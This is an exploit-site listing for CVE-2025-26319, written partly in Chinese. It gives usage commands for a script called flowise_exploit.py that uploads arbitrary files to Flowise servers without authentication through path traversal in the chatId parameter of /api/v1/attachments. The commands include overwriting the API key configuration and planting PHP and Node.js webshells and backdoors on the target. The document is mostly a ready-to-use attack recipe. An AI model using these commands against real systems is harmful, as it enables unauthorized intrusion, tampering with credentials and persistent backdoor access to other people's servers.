Exploit for CVE-2025-26319

Name: Exploit for CVE-2025-26319
Rating: 5 (78 reviews)

2025-03-13 | CVSS 9.8

## https://sploitus.com/exploit?id=E69D6761-F3A0-574E-8186-45372EA2FA12
# CVE-2025-26319
1. 基本文件上传
python flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txt
2. 上传配置文件
# 修改API密钥配置
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json
3. 自动生成并上传Webshell
# 上传PHP Webshell
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php

# 上传Node.js后门
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js

攻击原理
利用/api/v1/attachments路由在白名单内，不需要身份验证
通过操纵chatId参数进行路径遍历（../../../）
上传任意文件到服务器文件系统的任意位置